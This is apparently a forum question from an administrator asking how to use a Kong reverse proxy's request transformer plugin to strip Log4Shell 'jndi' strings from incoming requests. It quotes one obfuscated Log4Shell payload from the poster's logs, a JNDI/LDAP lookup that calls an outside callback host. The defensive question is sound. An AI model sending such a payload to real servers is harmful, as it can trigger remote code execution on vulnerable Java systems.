I am using a kong reverse proxy to proxy every HTTP request for my web servers. I would like to mitigate the current log4j problem ("log4shell") by finding and replace the critical attacers' strings like "jndi". For example I found this im my logs:
${jndi:${lower:l}${lower:d}a${lower:p}://xxx.log4j.bin${upper:a}xxx.xx:80/callback}
I think this could be accomplished by using the request transformer plugin. Has anyone already done this?
P.S. Just replaceing jndi
by disabled
is too far-reaching and breaks a lot of things.